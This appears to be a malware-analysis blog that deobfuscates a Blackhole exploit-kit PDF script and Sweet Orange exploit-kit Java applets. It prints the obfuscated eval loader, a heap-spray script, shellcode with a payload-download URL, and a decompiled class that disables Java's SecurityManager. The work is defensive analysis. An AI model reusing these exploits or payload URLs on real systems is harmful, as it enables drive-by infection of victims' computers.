2**22**^!@#**2M**4D**4M**4P**^!@#**23**46**3A**2H**^!@#**2O**2B**2M**46**^!@#**3A**2H**2N**46**^!@#**3A**2C**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**2M**46**3A**^!@#**2H**26**26**24**^!@#**58**46**4J**2K**^!@#**2O**46**3A**2F**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**2M**^!@#**46**3A**2I**2O**^!@#**46**3A**2C**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**24**2M**^!@#**46**3A**2J**2O**^!@#**46**3A**2F**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**2O**46**^!@#**4J**2K**24**2M**^!@#**46**3A**2G**26**^!@#**2O**3K**51**4P**^!@#**4G**4L**4E**29**^!@#**4D**4P**4M**4K**^!@#**34**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**23**46**3A**2I**^!@#**45**46**3A**2J**^!@#**24**2M**5A**4P**^!@#**4C**51**52**4P**^!@#**4L**1L**46**3A**^!@#**2G**5A**4D**52**^!@#**4L**4A**51**4G**^!@#**4M**4L**1L**46**^!@#**3A**2K**23**46**^!@#**3A**2H**24**58**^!@#**46**4H**2B**2O**^!@#**46**3A**2H**29**^!@#**51**4M**3K**51**^!@#**4P**4G**4L**4E**^!@#**23**2C**2H**24**^!@#**2M**46**4H**2C**^!@#**2O**46**4H**2B**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**2M**^!@#**46**3A**2G**2O**^!@#**23**46**4H**2C**^!@#**2O**2D**24**3O**^!@#**22**2B**22**26**^!@#**46**4H**2B**2L**^!@#**46**4H**2B**2M**^!@#**4P**4C**51**52**^!@#**4P**4L**1L**46**^!@#**3A**2G**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4H**2D**23**^!@#**46**3A**2C**24**^!@#**58**46**3A**2G**^!@#**2O**22**22**2M**^!@#**4D**4M**4P**23**^!@#**46**3A**2H**2O**^!@#**2B**2M**46**3A**^!@#**2H**2N**46**3A**^!@#**2C**29**4J**4C**^!@#**4L**4E**51**4F**^!@#**2M**46**3A**2H**^!@#**26**2O**2D**24**^!@#**58**46**3A**2G**^!@#**26**2O**22**2O**^!@#**52**22**2M**46**^!@#**3A**2G**26**2O**^!@#**46**3A**2K**23**^!@#**46**3A**2C**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**26**2C**^!@#**24**24**2M**46**^!@#**3A**2G**26**2O**^!@#**46**3A**2K**23**^!@#**46**3A**2C**29**^!@#**4A**4F**48**4P**^!@#**34**4M**4B**4C**^!@#**32**51**23**46**^!@#**3A**2H**24**24**^!@#**5A**4P**4C**51**^!@#**52**4P**4L**1L**^!@#**46**3A**2G**5A**^!@#**4D**52**4L**4A**^!@#**51**4G**4M**4L**^!@#**1L**46**4H**2E**^!@#**23**24**58**46**^!@#**4H**2F**2O**46**^!@#**4J**2G**23**24**^!@#**2M**4G**4D**23**^!@#**46**4H**2F**2N**^!@#**2K**2B**2B**2B**^!@#**24**58**46**4H**^!@#**2G**2O**22**4M**^!@#**26**52**32**3K**^!@#**4H**4E**4E**4E**^!@#**4I**4N**52**3D**^!@#**2F**33**3C**2A**^!@#**2A**2A**2A**2A**^!@#**54**32**32**32**^!@#**32**33**32**32**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**32**32**3I**32**^!@#**32**32**32**32**^!@#**32**32**32**4D**^!@#**4F**48**32**3K**^!@#**4G**32**4E**4O**^!@#**32**2K**2J**36**^!@#**3A**33**3C**22**^!@#**2M**46**4H**2H**^!@#**2O**46**4J**2C**^!@#**2M**46**4H**2I**^!@#**2O**46**3A**2E**^!@#**23**46**4H**2H**^!@#**24**5A**4C**4J**^!@#**5O**4C**58**46**^!@#**4H**2G**2O**22**^!@#**4I**33**26**32**^!@#**3K**4H**4G**3I**^!@#**4F**36**4N**2K**^!@#**4D**4M**33**3C**^!@#**2A**2A**2A**2A**^!@#**2A**54**32**32**^!@#**32**32**33**32**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**32**32**32**3I**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**4O**55**34**32**^!@#**3K**4G**32**4E**^!@#**4O**32**2A**4D**^!@#**36**2F**33**3C**^!@#**22**2M**46**4H**^!@#**2H**2O**46**4J**^!@#**2D**2M**46**4H**^!@#**2I**2O**46**3A**^!@#**2E**23**46**4H**^!@#**2H**24**5A**46**^!@#**4H**2J**2O**22**^!@#**3K**3M**4I**4O**^!@#**32**35**4E**4E**^!@#**32**32**33**33**^!@#**22**2M**46**4H**^!@#**2K**2O**46**3A**^!@#**2D**23**22**3I**^!@#**3M**37**33**22**^!@#**27**2C**2B**2K**^!@#**2J**2F**24**2M**^!@#**46**4J**4J**2B**^!@#**2O**22**3I**3I**^!@#**4A**32**32**32**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**54**3A**32**^!@#**32**32**32**3I**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**33**32**32**^!@#**32**32**32**54**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**33**32**32**^!@#**32**32**33**4E**^!@#**36**35**32**32**^!@#**36**32**32**32**^!@#**32**33**32**32**^!@#**32**32**36**3I**^!@#**36**36**32**32**^!@#**36**32**32**32**^!@#**32**3A**32**32**^!@#**32**32**37**54**^!@#**36**36**32**32**^!@#**36**32**32**32**^!@#**32**54**3A**32**^!@#**32**32**3M**32**^!@#**36**35**32**3E**^!@#**54**32**32**32**^!@#**34**3K**3A**32**^!@#**32**32**32**32**^!@#**32**32**32**32**^!@#**32**3E**35**32**^!@#**4H**2A**2A**2A**^!@#**2A**2A**22**2M**^!@#**46**4J**4J**2C**^!@#**2O**46**4H**2J**^!@#**26**46**4H**2K**^!@#**26**46**4J**4J**^!@#**2B**26**46**4H**^!@#**2G**2M**46**4J**^!@#**4J**2D**2O**46**^!@#**4H**4G**2C**23**^!@#**46**4H**2I**27**^!@#**22**22**24**2M**^!@#**4G**4D**23**46**^!@#**4J**4J**2D**29**^!@#**4J**4C**4L**4E**^!@#**51**4F**2O**2D**^!@#**24**46**4J**4J**^!@#**2D**26**2O**52**^!@#**4L**4C**5O**4A**^!@#**48**4N**4C**23**^!@#**22**2O**2B**2B**^!@#**22**24**2M**46**^!@#**4J**4J**2E**2O**^!@#**46**4H**2D**23**^!@#**46**4J**4J**2D**^!@#**24**2M**54**4G**^!@#**51**4F**23**58**^!@#**4I**2L**46**4J**^!@#**4J**2E**5A**24**^!@#**46**3A**2B**23**^!@#**4I**24**2M**3A**^!@#**4K**48**4E**4C**^!@#**37**4G**4C**4J**^!@#**4B**2C**29**4P**^!@#**48**54**3N**48**^!@#**4J**52**4C**2O**^!@#**46**4J**4J**2C**^!@#**5A**46**4H**2E**^!@#**23**24**2M';
a=a.replace.apply(a,[/(\^!@#)|(\*)/g,&quot;&quot;]);
s=[];
cc=String;
cc=cc[pp];
tt=event[cc.apply(String,[Ox74,Ox61,Ox72,Ox67,Ox65,Ox74])];
for(i=O;i&lt;a.&#1O8;ength;i+=2){
 s.push(tt[p](a.&#115;ubstr(i,3-1),26)-15);
}
if(tt.info["Authors"]===null){
 k=cc.apply(String,s);
 q="e"+cc.apply(String,[Ox76]);
 q+="al";
 tt[q](&#1O7;);
}
</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:O, color:ff8O8O, origin:(O,O), interval:(125OOO,125OOO)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:O?><?templateDesigner Zoom 76?></template>



Lets clean it, run it through node-js and see what comes out:

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = "4c2O6OOfO5178O4a3c2O6OOfOf638O4aa3eb8O4a3O2O824a6e2f8O4a4141414126OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO12398O4a642O6OOfOOO4OOOO4141414141414141" + "OOOO5636d697d3f646366226c6873626d34746761767e6629613d396f6573762f613a31333a36723a3e613a3e613a3e613a33333a32333a3e613a37613d356O7f656175766d662a613a3O333a39613a3b613a38613d3O73766f3O786O7e217f23693O343935333264693135333239316832673934653O3361623162316167323f23693O343935333264693135333239316832673934653O3361623162316167323f24353e25363e2132313e2932313f2f2a3O7474786O7f2a16397646cb1b5a8ac33db1Of698eOa8ef89ceeOe4e8ffffefc98e8O65ffefa6OOa64c57OOf3O874af57OOf3O87431be2ObecO3c384O65ff35cObe38OOa64O65ff35OOa66157Oc584165ffOOa67535OOa6OOa615144Od14488O34O1ca895OO9Od1446cc6c646e25Od1447c4726O777OOd1447c159c338eb8cO65ffOOOOOO8f8635O237d2O28O42447c233327674O42447c37765627424O7ccO42c5d8OOOO1O4Oce1827be2Obeffffff168e8eb88O4c3861ff45d6c6275786OOOOe6f6863eff5O3c38O1e5b8ceb855O591Oc38O5OOOOOOff86O4a6O585OOOOOOOO8e9f2effffff898e955Oa67fb88O86b83fbe693O4733cOd7O8O286b8da35be3c95e5ba5c3Ob84Ob8dd3O8db8cO4245ffce64d8b4cOb866dd3O42e5b8e56e57f1b31fbeO4ad3OdObc1c8O472f83O1ebfObd335c3Odacf14949c335f3OO267b8655f3O875347b8c357b86515c4be9e15574e58424378bf576O93643cO3O4b88bffffO151ee18c233473Oc3e5b866bd338O67b865c1O7b8cOO4b8O3O4b846Oc33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
var _l2 = "4c2O6OOfa5638O4a3c2O6OOf96218O4a9O1f8O4a3O9O844a7d7e8O4a4141414126OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO71888O4a642O6OOfOOO4OOOO4141414141414141" + "OOOO5636d697d3f646366226c6873626d34746761767e6629613d396f6573762f613a31333a36723a3e613a3e613a3e613a33333a32333a3e613a37613d356O7f656175766d662a613a3O333a39613a3b613a38613d3O73766f3O786O7e217f23693O343935333264693135333239316832673934653O3361623162316167323f23693O343935333264693135333239316832673934653O3361623162316167323f24353e25363e2132313e2932313f2f2a3O7474786O7f2a16397646cb1b5a8ac33db1Of698eOa8ef89ceeOe4e8ffffefc98e8O65ffefa6OOa64c57OOf3O874af57OOf3O87431be2ObecO3c384O65ff35cObe38OOa64O65ff35OOa66157Oc584165ffOOa67535OOa6OOa615144Od14488O34O1ca895OO9Od1446cc6c646e25Od1447c4726O777OOd1447c159c338eb8cO65ffOOOOOO8f8635O237d2O28O42447c233327674O42447c37765627424O7ccO42c5d8OOOO1O4Oce1827be2Obeffffff168e8eb88O4c3861ff45d6c6275786OOOOe6f6863eff5O3c38O1e5b8ceb855O591Oc38O5OOOOOOff86O4a6O585OOOOOOOO8e9f2effffff898e955Oa67fb88O86b83fbe693O4733cOd7O8O286b8da35be3c95e5ba5c3Ob84Ob8dd3O8db8cO4245ffce64d8b4cOb866dd3O42e5b8e56e57f1b31fbeO4ad3OdObc1c8O472f83O1ebfObd335c3Odacf14949c335f3OO267b8655f3O875347b8c357b86515c4be9e15574e58424378bf576O93643cO3O4b88bffffO151ee18c233473Oc3e5b866bd338O67b865c1O7b8cOO4b8O3O4b846Oc33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
//_l3 = app; @malforsec not needed
_l4 = new Array();

function _l5() {
//    var _l6 = _l3.viewerVersion.toString();
    var _l6 = "9.3.O"; //@malforsec set viewer version
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += 'O';
    return parseInt(_l6, 1O)
}
function _l7(_l8, _l9) {
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(O, _l9 / 2)
}
function _IO(_I1) {
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9O9O');
    spray = _l7(dakRote, Ox2OOO - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524O98);
    for (i = O; i < 4OO; i++) _l4[i] = loxWhee.substr(O, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len) {
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(O, len)
}
function _I3(_I1) {
    ret = '';
    for (i = O; i < _I1.length; i += 2) {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4) {
    _I5 = '';
    for (_I6 = O; _I6 < _I1.length; _I6++) {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6) {
    _jO = _I6.toString(16);
    _j1 = _jO.length;
    _I5 = (_j1 % 2) ? 'O' + _jO : _jO;
    return _I5
}
function _j2(_I1) {
    _I5 = '';
    for (_I6 = O; _I6 < _I1.length; _I6 += 2) {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3() {
    _j4 = _l5();
    if (_j4 < 9OOO) {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    } else {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 1O984);
    _llO = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _llO + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%OO');
    _ll3 = _j2(_ll2);
    with({
        k: _ll3
    }) _IO(k);
//    ImageField1.rawValue = _ll1
    console.log(_ll1); //@malforsec log result
}
_j3();



Thats better! Looks like shellcode in the middle there.

3. Shellcode


Some magic is performed by these dark agents, or should we call them Dark Knights. Lets see if we can do just as good as King Arthur and see if we too can pass over the bridge when meeting The Dark Knight  (youtube - warning not for sensitive people).

Short Python intermesso: Just concatenating the strings from the JavaScript code. Last string reversed. Output the chars to get bin code.


>>> hexstr = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + "00005636d697d3f646366226c6873626d34746761767e6629613d396f6573762f613a31333a36723a3e613a3e613a3e613a33333a32333a3e613a37613d35607f656175766d662a613a30333a39613a3b613a38613d3073766f3078607e217f23693034393533326469313533323931683267393465303361623162316167323f23693034393533326469313533323931683267393465303361623162316167323f24353e25363e2132313e2932313f2f2a30747478607f2a16397646cb1b5a8ac33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c384065ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446cc6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c233327674042447c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f6863eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b83fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e56e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b86515c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c004b80304b8460c33f59e43574e58cfcf4e3866"[::-1]
>>> hexbytes = "".join(chr(int(hexstr[i:i+2],16)) for i in xrange(0,len(hexstr),2))
>>> hexbytes
'L `\x0f\x05\x17\x80J< `\x0f\x0fc\x80J\xa3\xeb\x80J0 \x82Jn/\x80JAAAA&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x129\x80Jd `\x0f\x00\x04\x00\x00AAAAAAAAf\x83\xe4\xfc\xfc\x85\xe4u4\xe9_3\xc0d\x8b@0\x8b@\x0c\x8bp\x1cV\x8bv\x083\xdbf\x8b^<\x03t3,\x81\xee\x15\x10\xff\xff\xb8\x8b@0\xc3F9\x06u\xfb\x874$\x85\xe4uQ\xe9\xebLQV\x8bu<\x8bt5x\x03\xf5V\x8bv \x03\xf53\xc9IA\xfc\xad\x03\xc53\xdb\x0f\xbe\x108\xf2t\x08\xc1\xcb\r\x03\xda@\xeb\xf1;\x1fu\xe6^\x8b^$\x03\xddf\x8b\x0cK\x8dF\xec\xffT$\x0c\x8b\xd8\x03\xdd\x8b\x04\x8b\x03\xc5\xab^Y\xc3\xebS\xad\x8bh \x80}\x0c3t\x03\x96\xeb\xf3\x8bh\x08\x8b\xf7j\x05Y\xe8\x98\xff\xff\xff\xe2\xf9\xe8\x00\x00\x00\x00XPj@h\xff\x00\x00\x00P\x83\xc0\x19PU\x8b\xec\x8b^\x10\x83\xc3\x05\xff\xe3hon\x00\x00hurlmT\xff\x16\x83\xc4\x08\x8b\xe8\xe8a\xff\xff\xff\xeb\x02\xebr\x81\xec\x04\x01\x00\x00\x8d\\$\x0c\xc7\x04$regs\xc7D$\x04vr32\xc7D$\x08 -s Sh\xf8\x00\x00\x00\xffV\x0c\x8b\xe83\xc9Q\xc7D\x1d\x00wpbt\xc7D\x1d\x05.dll\xc6D\x1d\t\x00Y\x8a\xc1\x040\x88D\x1d\x04AQj\x00j\x00SWj\x00\xffV\x14\x85\xc0u\x16j\x00S\xffV\x04j\x00\x83\xeb\x0cS\xffV\x04\x83\xc3\x0c\xeb\x02\xeb\x13G\x80?\x00u\xfaG\x80?\x00u\xc4j\x00j\xfe\xffV\x08\xe8\x9c\xfe\xff\xff\x8eN\x0e\xec\x98\xfe\x8a\x0e\x89o\x01\xbd3\xca\x8a[\x1b\xc6Fy6\x1a/phttp://129.121.65.54/27aa2a2ac05d97b8a923519db359409c/27aa2a2ac05d97b8a923519db359409c/q.php?fsp=1h:1k:1i:30:1j&mfuqeope=1g:1n:32:33:1n:1n:1n:2v:31:1o&suoi=1i&nvqgdt=bcxlb&cdo=ymce\x00\x00'



Looks like we got some nice bin code out, and we even got straight to The Holy Grai.. - eehhm payload URL.

4. Payload URL


lets look at the code in hex - ascii format


0000000: 4c20 600f 0517 c280 4a3c 2060 0f0f 63c2  L `.....J< `..c.
0000010: 804a c2a3 c3ab c280 4a30 20c2 824a 6e2f  .J......J0 ..Jn/
0000020: c280 4a41 4141 4126 0000 0000 0000 0000  ..JAAAA&........
0000030: 0000 0000 0000 0012 39c2 804a 6420 600f  ........9..Jd `.
0000040: 0004 0000 4141 4141 4141 4141 66c2 83c3  ....AAAAAAAAf...
0000050: a4c3 bcc3 bcc2 85c3 a475 34c3 a95f 33c3  .........u4.._3.
0000060: 8064 c28b 4030 c28b 400c c28b 701c 56c2  .d..@0..@...p.V.
0000070: 8b76 0833 c39b 66c2 8b5e 3c03 7433 2cc2  .v.3..f..^<.t3,.
0000080: 81c3 ae15 10c3 bfc3 bfc2 b8c2 8b40 30c3  .............@0.
0000090: 8346 3906 75c3 bbc2 8734 24c2 85c3 a475  .F9.u....4$....u
00000a0: 51c3 a9c3 ab4c 5156 c28b 753c c28b 7435  Q....LQV..u<..t5
00000b0: 7803 c3b5 56c2 8b76 2003 c3b5 33c3 8949  x...V..v ...3..I
:
0000130: 6a05 59c3 a8c2 98c3 bfc3 bfc3 bfc3 a2c3  j.Y.............
0000140: b9c3 a800 0000 0058 506a 4068 c3bf 0000  .......XPj@h....
0000150: 0050 c283 c380 1950 55c2 8bc3 acc2 8b5e  .P.....PU......^
0000160: 10c2 83c3 8305 c3bf c3a3 686f 6e00 0068  ..........hon..h
0000170: 7572 6c6d 54c3 bf16 c283 c384 08c2 8bc3  urlmT...........
0000180: a8c3 a861 c3bf c3bf c3bf c3ab 02c3 ab72  ...a...........r
0000190: c281 c3ac 0401 0000 c28d 5c24 0cc3 8704  ..........\$....
00001a0: 2472 6567 73c3 8744 2404 7672 3332 c387  $regs..D$.vr32..
00001b0: 4424 0820 2d73 2053 68c3 b800 0000 c3bf  D$. -s Sh.......
00001c0: 560c c28b c3a8 33c3 8951 c387 441d 0077  V.....3..Q..D..w
00001d0: 7062 74c3 8744 1d05 2e64 6c6c c386 441d  pbt..D...dll..D.
00001e0: 0900 59c2 8ac3 8104 30c2 8844 1d04 4151  ..Y.....0..D..AQ
00001f0: 6a00 6a00 5357 6a00 c3bf 5614 c285 c380  j.j.SWj...V.....
0000200: 7516 6a00 53c3 bf56 046a 00c2 83c3 ab0c  u.j.S..V.j......
0000210: 53c3 bf56 04c2 83c3 830c c3ab 02c3 ab13  S..V............
0000220: 47c2 803f 0075 c3ba 47c2 803f 0075 c384  G..?.u..G..?.u..
0000230: 6a00 6ac3 bec3 bf56 08c3 a8c2 9cc3 bec3  j.j....V........
0000240: bfc3 bfc2 8e4e 0ec3 acc2 98c3 bec2 8a0e  .....N..........
0000250: c289 6f01 c2bd 33c3 8ac2 8a5b 1bc3 8646  ..o...3....[...F
0000260: 7936 1a2f 7068 7474 703a 2f2f 3132 392e  y6./phttp://129.
0000270: 3132 312e 3635 2e35 342f 3237 6161 3261  121.65.54/27aa2a
0000280: 3261 6330 3564 3937 6238 6139 3233 3531  2ac05d97b8a92351
0000290: 3964 6233 3539 3430 3963 2f32 3761 6132  9db359409c/27aa2
00002a0: 6132 6163 3035 6439 3762 3861 3932 3335  a2ac05d97b8a9235
00002b0: 3139 6462 3335 3934 3039 632f 712e 7068  19db359409c/q.ph
00002c0: 703f 6673 703d 3168 3a31 6b3a 3169 3a33  p?fsp=1h:1k:1i:3
00002d0: 303a 316a 266d 6675 7165 6f70 653d 3167  0:1j&mfuqeope=1g
00002e0: 3a31 6e3a 3332 3a33 333a 316e 3a31 6e3a  :1n:32:33:1n:1n:
00002f0: 316e 3a32 763a 3331 3a31 6f26 7375 6f69  1n:2v:31:1o&suoi
0000300: 3d31 6926 6e76 7167 6474 3d62 6378 6c62  =1i&nvqgdt=bcxlb
0000310: 2663 646f 3d79 6d63 6500 000a            &cdo=ymce...




Yes we got the url rgiht. So if we where after that we could now just fetch it...

5. Epilogue


Feels good to be on the same side as King Arthur and to be able to reverse and deobfuscate the Black(hole) Knights evi(a)l doings. And get our hands on The Holy Grail.

PS: running the shellcode with sctest and rasm failed with errors due to buffer overflow - any tip on how to get around that very much appreciated



Happy Blackhole PDF deobfuscation :)

Tuesday, March 26, 2013

Making Orange JAM - analyzing Sweet Orange EK Java Archive files


After serving fresh orange juice the other day(Sweet orange EK analysis), grabbing all the evil files off the Sweet Orange exploit kit. We are now sitting here with piles of squeezed orange leftovers. What better idea than to go all the way and make some jam of the leftovers.

To the task of understanding, deobfuscating and reversing Sweet Orange EK JARs. I'm still working on my Python skills so I will throw in some Python code to learn. And my Java FU is not getting better so handling that code is not the way to understand what these bad guys are up to.

But lets see if we can figure out what theyre are up to this time. (see the link above if you need to look into how to pull the archives from the kit).

1. Pull the archive in jd-gui




Lots of strangly named class files. Note that YDXIOXz.bmbf is not even a class. We have located the Class with the applet where the execution starts, just have to look in the Init() method to see what fun stuff is done here

2. Init()


Not much; just instantiatin of QcVEtjNkP

3. Moving on


Finally something is happening: Reading that resource we noted right out of the archive YDXIOXz.bmbf. Creates the Class and moves on to instantiate the class.


Here is is the trick to execute priveleged: CVE-2013-0442; in more detail here 


The URL strings are manipulated this way


Here they build the URL to the exe payload they will fetch. Writing the file to java.io.tmpdir and setting it up be registered as a service and executed.


Finally here is how they manipulate the exe payload before they write it to disk.

4. Overview


So we have covered the basic outline of what the applet wants to do: read(probably a obfuscated class) from the archive, use the vulnerability in com.sun.jmx.mbeanserver.MBeanInstantiator to be able to load classes in previledged mode, invoke the YDXIOXz.bmbf mystery class and then fetch some eviel code and run that on some poor innocent guys computer.

5. Deobfuscation

To bring in some fun into this task, lets see if we can create some Python code to deobfuscate and decrypt their bad code.

5a. Lets look into the mystery resource

First thing first; read the file and replace the SPAM. Fortunately, as in opposite to Mony Python movies, we are allowed to remove the SPAM from these dishes. Whatch on youtube


String str = nkkPPUO(QcVEtjNkP.class.getResourceAsStream("YDXIOXz.bmbf")).replace("^@@#[^]^###", "");

Start of original file: Definately ^@@#[^]^### SPAM in there
CA^@@#[^]^###FE^@@#[^]^###BA^@@#[^]^###BE^@@#[^]^###00^@@#[^]^###00^@@#[^]^###00^@@#[^]^###31^@@#[^]^###00^@@#[^]^###59^@@#[^]^###0A^@@#
[^]^###00^@@#[^]^###11^@@#[^]^###00^@@#[^]^###20^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###21^@@#[^]^###00^@@#[^]^###22^@@#[^]^###07^@@#[^]^##
#00^@@#[^]^###23^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###24^@@#[^]^###00^@@#[^]^###25^@@#[^]^###09^@@#[^]^###00^@@#[^]^###0D^@@#[^]^###00^@@
#[^]^###26^@@#[^]^###08^@@#[^]^###00^@@#[^]^###27^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###28^@@#[^]^###00^@@#[^]^###29^@@#[^]^###09^@@#[^]^#
##00^@@#[^]^###2A^@@#[^]^###00^@@#[^]^###2B^@@#[^]^###07^@@#[^]^###00^@@#[^]^###2C^@@#[^]^###07^@@#[^]^###00^@@#[^]^###2D^@@#[^]^###0A^@
@#[^]^###00^@@#[^]^###2E^@@#[^]^###00^@@#[^]^###2F^@@#[^]^###07^@@#[^]^###00^@@#[^]^###30^@@#[^]^###07^@@#[^]^###00^@@#[^]^###33^@@#[^]^
###08^@@#[^]^###00^@@#[^]^###34^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###0C^@@#[^]^###00^@@#[^]^###35^@@#[^]^###08^@@#[^]^###00^@@#[^]^###36^
@@#[^]^###07^@@#[^]^###00^@@#[^]^###37^@@#[^]^###0A^@@#[^]^###00^@@#[^]^###3

After SPAM reduction; simple replace:
CAFEBABE0000003100590A001100200A002100220700230A0024002509000D00260800270A0028002909002A002B07002C07002D0A002E002F0700300700330800340A000C00350800360700370A003800390A0016003A07003B0A003C003D07003E07003F0100063C696E69743E010003282956010004436F646501000743616C6C53656301001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295601000A457863657074696F6E7301000372756E01001428294C6A6176612F6C616E672F4F626A6563743B0C001800190700400C004100420100136A6176612F6C616E672F457863657074696F6E0700430C004400450C0046004701000C7364667364667364667364660700480C0049004A07004B0C004C004D01000F6A6176612F6C6

Mmmm - SPAM reduction worked and looks like we are looking into a Java Class file which in hex starts with CAFEBABE. Just generate bytecode, disassemble and we have the class to look at(for details on dissasembly look here):

// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3) 

import java.io.PrintStream;
import java.lang.invoke.*;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class disabler
    implements PrivilegedExceptionAction
{

    public disabler()
    {
        try
        {
            AccessController.doPrivileged(this);
        }
        catch(Exception exception) { }
    }

    void CallSec(SecurityManager securitymanager)
        throws Throwable
    {
        java.lang.invoke.MethodHandles.Lookup lookup = MethodHandles.publicLookup();
        System.out.println("sdfsdfsdfsdf");
        MethodType methodtype = MethodType.methodType(Void.TYPE, new Class[] {
            java/lang/SecurityManager
        });
        MethodHandle methodhandle = ((java.lang.invoke.MethodHandles.Lookup)lookup).findStatic(java/lang/System, "setSecurityManager", methodtype);
        System.out.println("sdfsdfsdfsdf 5");
        methodhandle.invokeWithArguments(new Object[] {
            null
        });
    }

    public Object run()
    {
        try
        {
            CallSec(null);
        }
        catch(Throwable throwable) { }
        return Integer.valueOf(56);
    }
}
Fun stuff: disabling the Java SecurityManager. Well chosen name disabler :) Kudos for originality. My choice: getRidOfSecurityManagerGoMakeSomeNiceGuysDayMiserable - But what do I know about JAva coding...

Instead I introduce the Python code to do it:

#@malforsec SPAM reduction and Sweet Orange java Bytecode maker
def decodeH(paramString):
  str1 = ""
  for i1 in range(0, (len(paramString)/2), 1):
    str1 += str(chr(int(paramString[(i1*2):((i1*2)+2)], 16)))
  return str1

def main():
  with open('resource.txt', 'r') as f1:
    decoded_class = decodeH(f1.read().replace('^@@#[^]^###', ''))
  with open('new.class', 'w') as fout:
    fout.write(decoded_class)

if __name__ == "__main__":
    main()

5b. The URL to fetch eveil code from the intertubes

Have in mind this is the applet tag variables:

name = "sSpwknEHBp
